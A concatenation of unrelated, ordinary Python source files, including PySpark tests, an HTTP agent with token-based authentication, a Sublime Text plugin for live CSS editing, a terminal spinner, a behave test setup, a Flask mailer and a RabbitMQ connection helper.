time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(xrange(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(xrange(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.isAlive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
class SparkSubmitTests(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content, dir=None):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name)
else:
os.makedirs(os.path.join(self.programDir, dir))
path = os.path.join(self.programDir, dir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content, ext=".zip", dir=None, zip_name=None):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name + ext)
else:
path = os.path.join(self.programDir, dir, zip_name + ext)
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def create_spark_package(self, artifact_name):
group_id, artifact_id, version = artifact_name.split(":")
self.createTempFile("%s-%s.pom" % (artifact_id, version), ("""
|<?xml version="1.0" encoding="UTF-8"?>
|<project xmlns="http://maven.apache.org/POM/4.0.0"
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
| xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
| http://maven.apache.org/xsd/maven-4.0.0.xsd">
| <modelVersion>4.0.0</modelVersion>
| <groupId>%s</groupId>
| <artifactId>%s</artifactId>
| <version>%s</version>
|</project>
""" % (group_id, artifact_id, version)).lstrip(),
os.path.join(group_id, artifact_id, version))
self.createFileInZip("%s.py" % artifact_id, """
|def myfunc(x):
| return x + 1
""", ".jar", os.path.join(group_id, artifact_id, version),
"%s-%s" % (artifact_id, version))
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out.decode('utf-8'))
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency(self):
"""Submit and test a script with a dependency on a Spark Package"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency_on_cluster(self):
"""Submit and test a script with a dependency on a Spark Package on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, "--master",
"local-cluster[1,1,1024]", script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
# this will fail if you have different spark.executor.memory
# in conf/spark-defaults.conf
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_get_or_create(self):
with SparkContext.getOrCreate() as sc:
self.assertTrue(SparkContext.getOrCreate() is sc)
def test_parallelize_eager_cleanup(self):
with SparkContext() as sc:
temp_files = os.listdir(sc._temp_dir)
rdd = sc.parallelize([0, 1, 2])
post_parallalize_temp_files = os.listdir(sc._temp_dir)
self.assertEqual(temp_files, post_parallalize_temp_files)
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_progress_api(self):
with SparkContext() as sc:
sc.setJobGroup('test_progress_api', '', True)
rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))
def run():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=run)
t.daemon = True
t.start()
# wait for scheduler to start
time.sleep(1)
tracker = sc.statusTracker()
jobIds = tracker.getJobIdsForGroup('test_progress_api')
self.assertEqual(1, len(jobIds))
job = tracker.getJobInfo(jobIds[0])
self.assertEqual(1, len(job.stageIds))
stage = tracker.getStageInfo(job.stageIds[0])
self.assertEqual(rdd.getNumPartitions(), stage.numTasks)
sc.cancelAllJobs()
t.join()
# wait for event listener to update the status
time.sleep(1)
job = tracker.getJobInfo(jobIds[0])
self.assertEqual('FAILED', job.status)
self.assertEqual([], tracker.getActiveJobsIds())
self.assertEqual([], tracker.getActiveStageIds())
sc.stop()
def test_startTime(self):
with SparkContext() as sc:
self.assertGreater(sc.startTime, 0)
class ConfTests(unittest.TestCase):
def test_memory_conf(self):
memoryList = ["1T", "1G", "1M", "1024K"]
for memory in memoryList:
sc = SparkContext(conf=SparkConf().set("spark.python.worker.memory", memory))
l = list(range(1024))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = list(map(gammaln, x))
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
stats_dict = s.asDict()
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_dict['sum'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['stdev'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['variance'].tolist())
stats_sample_dict = s.asDict(sample=True)
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_sample_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_sample_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_sample_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_sample_dict['sum'].tolist())
self.assertSequenceEqual(
[0.816496580927726, 0.816496580927726], stats_sample_dict['stdev'].tolist())
self.assertSequenceEqual(
[0.6666666666666666, 0.6666666666666666], stats_sample_dict['variance'].tolist())
if __name__ == "__main__":
from pyspark.tests import *
if not _have_scipy:
print("NOTE: Skipping SciPy tests as it does not seem to be installed")
if not _have_numpy:
print("NOTE: Skipping NumPy tests as it does not seem to be installed")
if xmlrunner:
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
else:
unittest.main()
if not _have_scipy:
print("NOTE: SciPy tests were skipped as it does not seem to be installed")
if not _have_numpy:
print("NOTE: NumPy tests were skipped as it does not seem to be installed")
|
BasicHttpAgent.py
|
# pip3 install requests Flask
from ..IOAgent import IOAgent
from abc import ABC
from http.server import HTTPServer, BaseHTTPRequestHandler
from http.client import HTTPSConnection, HTTPConnection
from base64 import b64encode
import sseclient
import requests
import threading
import platform
import subprocess
import pprint
import cgi
import json
import logging
IOAgent = IOAgent
module_logger = logging.getLogger('BasicHttpAgent')
#https://stackoverflow.com/questions/2953462/pinging-servers-in-python
def ping(host):
"""
Returns True if host (str) responds to a ping request.
Remember that a host may not respond to a ping (ICMP) request even if the host name is valid.
"""
# Option for the number of packets as a function of
param = '-n' if platform.system().lower()=='windows' else '-c'
if(host[0] == '['): # ipv6 address
host = host[1:40]
command = ['ping', param, '1', '-6', host]
else:
# Building the command. Ex: "ping -c 1 google.com"
command = ['ping', param, '1', host]
return subprocess.call(command) == 0
"""
app = Flask(__name__)
@app.route("/<url>", methods = ['POST'])
def http_endpoint(url):
return {
"message": "request OK"
}, 200 """
#todo: make child classes for specific adapters for data validation/transformation depending on use-case
class BasicHttpAgent(IOAgent, ABC):
def __init__(self, *args):
super().__init__(*args)
self.logger = logging.getLogger('BasicHttpAgent')
self.connection = None
self.headers = {}
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def __init__(self, adapter, *args):
self.adapter = adapter
super().__init__(*args)
def set_headers(self, statuscode):
self.send_response(statuscode)
self.send_header('Content-type', 'application/json')
self.end_headers()
#https://gist.github.com/nitaku/10d0662536f37a087e1b
def do_POST(self):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
# refuse to receive non-json content
if ctype != 'application/json':
self.set_headers(400)
return
# read the message and convert it into a python dictionary
length = int(self.headers.get('content-length'))
message = json.loads(self.rfile.read(length))
# send the message back
self.set_headers(200)
self.wfile.write(str.encode(json.dumps({'received': 'ok'})))
self.adapter.receive_from_downlink(message)
def initiate_agent(self, config, callback):
self.connection_host = f"{self.connection_ip}:{self.port}"
self.connection_url = f"http://{self.connection_host}" # + config url
self.host_url = "/" # + config
self.message_received_callback = callback
# https://stackoverflow.com/questions/18444395/basehttprequesthandler-with-custom-instance
# def handler(*args):
# return BasicHttpAdapter.SimpleHTTPRequestHandler(self, *args)
# self.httpd = HTTPServer(('localhost', 5000), handler)
# threading.Thread(target=self.httpd.serve_forever).start()
def send_downlink(self, message, *args):
requests.post(self.connection_url, message)
def receive_from_downlink(self, message):
#if url == self.host_url:
# parse incomming message
self.from_downlink_to_central(message)
def disconnect(self, *args):
self.on_disconnect()
def connect(self, *args):
# if ping(self.connection_ip):
self.on_connect()
def set_headers(self, headers):
self.headers = headers
def basic_auth(self, uri):
self.connection = HTTPSConnection(f"{self.connection_ip}:{self.port}")
# authenticate with client_id and client_secret
auth_string = b64encode(bytes(self.user + ':' + self.password, "utf-8")).decode("ascii")
headers = {
'Content-type': "application/x-www-form-urlencoded",
'Authorization': 'Basic %s' % auth_string
}
body = f"grant_type=client_credentials"
self.connection.request('POST', f'/{uri}', headers=headers, body=bytes(body, encoding="utf-8"))
res = self.connection.getresponse()
data = res.read()
self.logger.debug("successfully authenticated")
return data
def rpt_auth(self, uri, access_token):
self.connection = HTTPSConnection(f"{self.connection_ip}:{self.port}")
# authenticate with access token
headers = {
'Content-type': "application/x-www-form-urlencoded",
'Authorization': 'Bearer %s' % access_token
}
body = f"grant_type=urn:ietf:params:oauth:grant-type:uma-ticket&audience=policy-enforcer"
self.connection.request('POST', f'/{uri}', headers=headers, body=bytes(body, encoding="utf-8"))
res = self.connection.getresponse()
data = res.read()
self.logger.debug("successfully got RTP token")
return data
def refresh_rpt(self, uri, refresh_token):
self.connection = HTTPSConnection(f"{self.connection_ip}:{self.port}")
# authenticate with access token
headers = {
'Content-type': "application/x-www-form-urlencoded"
}
body = f"grant_type=refresh_token&refresh_token={refresh_token}&client_id={self.user}&client_secret={self.password}"
self.connection.request('POST', f'/{uri}', headers=headers, body=bytes(body, encoding="utf-8"))
res = self.connection.getresponse()
data = res.read()
self.logger.debug("successfully refreshed token")
return data
def get_stream(self, uri):
try:
headers = {
'Accept': "text/event-stream"
}
response = requests.get(uri, stream=True, headers=headers)
client = sseclient.SSEClient(response)
for event in client.events():
# pprint.pprint(json.loads(event.data))
self.message_received_callback(event.data)
except Exception as e:
self.logger.error("failed to parse message: " + str(e))
def on_message_received(self, client, config, msg):
self.logger.debug("received message")
data = msg.payload
try:
if isinstance(data, str):
payload = json.loads(json.dumps(data))
else:
payload = json.loads(data)
self.message_received_callback(payload)
except Exception as e:
self.logger.error("failed to parse message: " + str(e))
def send_message(self, uri, msg, method):
self.connection = HTTPConnection(host=self.connection_ip, port=self.port, timeout=128)
try:
self.connection.request(method, f'/{uri}', body=msg, headers=self.headers)
res = self.connection.getresponse()
data = res.read()
self.logger.debug(method + " " + uri + " returned " + str(res.status))
self.connection.close()
return res.status, data
except Exception as e:
self.logger.error("failed to parse or send message: " + str(e))
def send_secure_message(self, uri, msg, token):
self.connection = HTTPSConnection(f"{self.connection_ip}:{self.port}")
try:
headers = {
'Authorization': 'Bearer %s' % token
}
self.logger.debug(msg)
self.connection.request('POST', f'/{uri}', headers=headers, body=msg)
res = self.connection.getresponse()
data = res.read()
self.logger.debug(data)
self.connection.close()
return res.status
except Exception as e:
self.logger.error("failed to parse or send message: " + str(e))
|
takana.py
|
import sublime, sublime_plugin, time, os.path, json, threading, sys, socket, time
from threading import Thread
try:
import socketserver
except ImportError:
import SocketServer as socketserver
VERSION = "Takana plugin v0.4"
DEBUG = False
TAKANA_SERVER_PORT = 48628
st_ver = 3000 if sublime.version() == '' else int(sublime.version())
print("***************************************")
print(VERSION)
class Error:
region_key = 'error_dot'
def __init__(self, file, line):
self.file = file
self.line = line
self.view = None
def update_view(self, view):
self.clear()
self.view = view
self.show()
def show(self):
if not self.view:
return
position = self.view.text_point(self.line - 1, 0)
region = sublime.Region(position, position)
scope = 'markup.deleted'
icon = 'dot'
self.view.add_regions(self.region_key, [region], scope, icon)
def clear(self):
if not self.view:
return
self.view.erase_regions(self.region_key)
class WindowWatcher(sublime_plugin.EventListener):
def on_close(self, view):
buffer_is_open = False
if not view.is_dirty():
return
for w in sublime.windows():
for v in w.views():
if v.buffer_id() == view.buffer_id():
buffer_is_open = True
if not buffer_is_open:
connection_manager.post(Message(['editor', 'reset'], {'path': view.file_name()}))
class ErrorManager(sublime_plugin.EventListener):
errors = {}
def on_activated_async(self, view):
ErrorManager.register_view(view)
@staticmethod
def put(file, line):
error = Error(file, line)
ErrorManager.errors[file] = error
# Check if the current view is the one for our error
ErrorManager.register_view(sublime.active_window().active_view())
@staticmethod
def remove(file):
if file in ErrorManager.errors:
ErrorManager.errors[file].clear()
del ErrorManager.errors[file]
@staticmethod
def remove_all():
keys = list(ErrorManager.errors.keys())
for file in keys:
ErrorManager.remove(file)
@staticmethod
def get(file):
if file in ErrorManager.errors:
return ErrorManager.errors[file]
else:
return None
@staticmethod
def register_view(view):
filename = view.file_name()
if filename:
error = ErrorManager.get(filename)
if error:
error.update_view(view)
class TakanaTCPHandler(socketserver.BaseRequestHandler):
def handle(self):
message = self.request.recv(1024).decode("utf-8")
message = Message.decode(message)
if message.event == ['project', 'errors', 'add']:
line = message.data['error']['line']
file = message.data['error']['file']
ErrorManager.put(file, line)
if message.event == ['goto', 'line']:
line = message.data['line']
file = message.data['file']
view = sublime.active_window().open_file(file)
time.sleep(0.1)
view.run_command("goto_line", {"line": line} )
elif message.event == ['project', 'errors', 'remove']:
ErrorManager.remove_all()
# ErrorManager.remove(message.data['error']['file'])
class TakanaSocketServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
# Ctrl-C will cleanly kill all spawned threads
daemon_threads = True
# much faster rebinding
allow_reuse_address = True
def __init__(self, server_address, RequestHandlerClass):
socketserver.TCPServer.__init__(self, server_address, RequestHandlerClass)
if st_ver >= 3000:
try:
socket_server = TakanaSocketServer(('localhost', TAKANA_SERVER_PORT), TakanaTCPHandler)
Thread(target=socket_server.serve_forever).start()
except Exception as e:
print('Takana: could not start server')
def plugin_unloaded():
print('Takana: closing socket server...')
if 'socket_server' in globals():
socket_server.shutdown()
socket_server.server_close()
pass
class Message:
def __init__(self, event, data):
self.event = event
self.data = data
def encode(self):
return json.dumps(self.event + [self.data])
@staticmethod
def decode(data):
message = json.loads(data)
data = message.pop()
event = message
return Message(event, data)
class Edit:
file_name = None
file_extension = None
time = None
def __init__(self, file_name, text, time):
self.file_name = file_name
self.text = text
self.time = time
def as_message(self):
data = {
'buffer' : self.text,
'path' : self.file_name,
'created_at' : self.time
}
return Message(['editor', 'update'], data)
class ConnectionManager:
socket = None
last_message = None
def __init__(self):
pass
def __connect(self):
print('Takana: connecting')
try:
serverHost = 'localhost' # servername is localhost
serverPort = 48627
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create a TCP socket
self.socket.settimeout(0.5)
self.socket.connect((serverHost, serverPort)) # connect to server on the port
except Exception as e:
self.socket = None
print('Takana: connection failed')
def __post(self):
msg = self.last_message.encode()
try:
if self.socket:
print("Takana: sending update....")
if st_ver >= 3000:
self.socket.send(bytes(msg + "\n","utf8"))
else:
self.socket.sendall(msg + "\n")
else:
self.__connect()
except socket.error as e:
print('Takana: socket exception occurred:')
print(e)
try:
self.socket.shutdown(socket.SHUT_WR)
self.socket.close()
except Exception as e:
print('Takana: socket already closed')
self.socket = None
print('Takana: Reconnecting')
self.__connect()
except socket.timeout:
print('Takana: socket timeout')
except IOError as e:
print('Takana: socket ioerror')
print(e)
except Exception as e:
print('Takana: post failed')
print(e)
def connect(self):
self.__connect()
def post(self, message):
self.last_message = message
self.__post()
connection_manager = ConnectionManager()
connection_manager.connect()
#
#
#
# TakanaEditListener
#
#
#
class DelayedTimer:
def __init__(self, delay, callback):
self.delay = delay
self.callback = callback
self.lastRequest = 0
self.scheduleTimer()
def scheduleTimer(self):
sublime.set_timeout(self.onTimer, int(self.delay * 1000))
def onTimer(self):
self.scheduleTimer()
if self.lastRequest > 0 and self.lastRequest + self.delay < time.time():
self.lastRequest = 0
self.callback()
def notify(self):
self.lastRequest = time.time()
class TakanaEditListener(sublime_plugin.EventListener):
delay = 0.035
view = None
supported_file_types = [".css", ".scss", ".sass", ".less"]
def __init__(self):
self.timer = DelayedTimer(self.delay, self.on_keystroke_end)
def on_modified(self, view):
if self.__should_monitor(view):
# find & replace
if view.command_history(0, True) == (u'', None, 1):
print('forcing update')
self.__on_change(view)
def on_keystroke_end(self):
timestamp = int(round(time.time() * 1000)) - (self.delay * 1000)
edit = Edit(
self.view.file_name(),
self.__text(),
timestamp
)
connection_manager.post(edit.as_message())
if DEBUG:
print('time_since_keystroke: ' + str( int(round(time.time() * 1000)) - timestamp - (self.delay * 1000) ))
def __on_change(self, view):
self.view = view
self.timer.notify()
def __should_monitor(self, view):
should_monitor = False
if view and view.file_name():
file_name, file_extension = os.path.splitext(view.file_name())
should_monitor = file_extension in self.supported_file_types
return should_monitor
def __text(self):
return self.view.substr(sublime.Region(0, self.view.size()))
|
waitingbar.py
|
#!/usr/bin/env python3
import sys
import threading
import time
from itertools import cycle
class WaitingBar(object):
'''
This class prints a fancy waiting bar with Greek chars and spins.
It uses a thread to keep printing the bar while the main program runs
Usage:
THE_BAR = WaitingBar('Your Message Here')
# Do something slow here
(...)
THE_BAR.stop()
copyright phoemur - 2016
'''
def __init__(self, message='[*] Wait until loading is complete...'):
self.MESSAGE = ' ' + str(message)
self.CYCLES = ['-', '-', '\\', '\\', '|', '|', '/', '/', '-', '-', '\\', '\\', '|', '|', '/', '/']
self.intab = u'abcdefghijklmnopqrstuvwxyzáàãâéèẽêíìîĩóòôõúùũûçABCDEFGHIJKLMNOPQRSTUVWXYZÁÀÃÂÉÈẼÊÍÌÎĨÓÒÔÕÚÙŨÛÇ'
self.outab = u'αβ¢ΔεϝγηιφκλμνΩπσϼΣτυϞωχψζααααεεεειιιιΩΩΩΩυυυυ¢αβ¢ΔεϝγηιφκλμνΩπσϼΣτυϞωχψζααααεεεειιιιΩΩΩΩυυυυ¢'
self.TABLE = {x: y for x, y in zip(self.intab, self.outab)}
self.event = threading.Event()
self.waiting_bar = threading.Thread(target=self.start, args=(self.event,))
self.waiting_bar.start()
def start(self, e):
for index in cycle(range(len(self.MESSAGE))):
if e.is_set():
break
if not self.MESSAGE[index].isalpha():
continue
for c in self.CYCLES:
buff = list(self.MESSAGE)
buff.append(c)
try:
if sys.stdout.encoding.upper() == 'UTF-8':
buff[index] = self.TABLE[buff[index]]
else:
buff[index] = buff[index].swapcase()
except KeyError:
pass
sys.stdout.write(''.join(buff))
time.sleep(0.05)
sys.stdout.write('\r')
sys.stdout.flush()
def stop(self):
self.event.set()
self.waiting_bar.join()
sys.stdout.write(self.MESSAGE + ' \n')
if __name__ == '__main__':
'''
A simple example to demonstrate the class in action
'''
# Start the bar
THE_BAR = WaitingBar('[*] Calculating useless stuff...')
# Do something slow
import math
from pprint import pprint
a_list = {a: b for a, b in zip(range(1, 41), map(math.factorial, range(1, 41)))}
time.sleep(20)
# Stop the bar and print result
THE_BAR.stop()
pprint(a_list)
|
environment.py
|
import threading
from wsgiref import simple_server
from handlers import app
from config import session
from repo import Repo
def clear_database():
with session() as db:
repo = Repo(db)
repo.clear_database()
db.commit()
def before_all(context):
context.host = 'localhost'
context.port = 8000
context.base_url = 'http://' + context.host + ':' + str(context.port)
context.server = simple_server.make_server(
host=context.host,
port=context.port,
app=app
)
context.thread = threading.Thread(target=context.server.serve_forever)
context.thread.start()
def after_all(context):
clear_database()
context.server.shutdown()
context.thread.join()
|
mailer.py
|
from flask import render_template
from flask_mail import Message
from threading import Thread
from app import mail
from app import webapp
from app.decorators import async
from premailer import Premailer, transform
from app.models import Utils
class Mailer():
@staticmethod
def send_async_mail(webapp, email):
with webapp.app_context():
mail.send(email)
@staticmethod
def excessOrder(user_id, item_id):
subject = "Excess Order Request"
email = Message(subject,
recipients=['contact@ostrichapp.in'])
email.body = "%d Tried to order Item %d" %(user_id, item_id)
mail.send(email)
return True
@staticmethod
def genericMailer(mail_obj, recipients=['contact@ostrichapp.in']):
with webapp.app_context():
email = Message(mail_obj['subject'],
recipients=recipients)
email.body = mail_obj['body']
mail.send(email)
return True
@staticmethod
@async
def welcomeMailer(user):
name = Utils.getUserName(user)
with webapp.app_context():
email = Message('Welcome to Ostrich!',
recipients=[user.email])
email.html = transform(render_template('mailers/welcome.html', name=name))
mail.send(email)
return True
@staticmethod
#TODO substitue @sync
def thankyou(user):
name = Utils.getUserName(user)
email = Message('Thank you for offering your book.',
recipients=[user.email])
email.html = render_template('mailers/inlined/thank_you.html', name=name)
thr = Thread(target=Mailer.send_async_mail, args=[webapp, email])
thr.start()
return True
@staticmethod
@async
def sendUpsellEmail(data):
name = Utils.getUserName(data['user'])
with webapp.app_context():
consumer_mail = render_template('mailers/extend_order.html',
name = name,
book_name = data['book_name'],
order_id = data['order_id'],
items = data['items'],
curated_items = data['curated_items'],
quote = data['quote'],
quote_author = data['quote_author'])
pre = Premailer(consumer_mail, remove_classes=False, strip_important=False)
consumer_mail = pre.transform()
email = Message('Enjoying the book?',
recipients=[data['user'].email])
email.html = consumer_mail
mail.send(email)
return True
|
Rabbit_Base.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 In-Q-Tel, Inc, All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' Created on 21 August 2017
@author: dgrossman
'''
import pika
import threading
import time
from functools import partial
from .Logger_Base import Logger
module_logger = Logger
class Rabbit_Base(object): # pragma: no cover
'''
Base Class for RabbitMQ
'''
def __init__(self):
self.logger = module_logger.logger
def make_rabbit_connection(self, host, port, exchange, queue_name, keys,
total_sleep=float('inf')): # pragma: no cover
'''
Connects to rabbitmq using the given hostname,
exchange, and queue. Retries on failure until success.
Binds routing keys appropriate for module, and returns
the channel and connection.
'''
wait = True
do_rabbit = True
rabbit_channel = None
rabbit_connection = None
while wait and total_sleep > 0:
try:
rabbit_connection = pika.BlockingConnection(
pika.ConnectionParameters(host=host, port=port))
rabbit_channel = rabbit_connection.channel()
rabbit_channel.exchange_declare(exchange=exchange,
exchange_type='topic')
rabbit_channel.queue_declare(queue=queue_name, exclusive=False)
self.logger.debug('connected to {0} rabbitmq...'.format(host))
wait = False
except Exception as e:
self.logger.debug(
'waiting for connection to {0} rabbitmq...'.format(host))
self.logger.debug(str(e))
time.sleep(2)
total_sleep -= 2
wait = True
if wait:
do_rabbit = False
if isinstance(keys, list) and not wait:
for key in keys:
self.logger.debug(
'array adding key:{0} to rabbitmq channel'.format(key))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=key)
if isinstance(keys, str) and not wait:
self.logger.debug(
'string adding key:{0} to rabbitmq channel'.format(keys))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=keys)
return rabbit_channel, rabbit_connection, do_rabbit
def start_channel(self, channel, mycallback, queue, m_queue):
